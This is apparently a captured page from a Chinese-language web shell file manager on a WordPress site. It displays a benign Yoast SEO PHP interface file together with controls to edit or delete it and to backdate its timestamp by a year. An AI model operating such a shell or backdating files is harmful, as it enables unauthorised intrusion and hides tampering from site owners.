文件操作 - command-interface.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/wordpress-seo/src/commands/command-interface.php
编辑文件内容
<?php namespace Yoast\WP\SEO\Commands; /** * Interface definition for WP CLI commands. * * An interface for registering integrations with WordPress. */ interface Command_Interface { /** * Returns the namespace of this command. * * @return string */ public static function get_namespace(); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件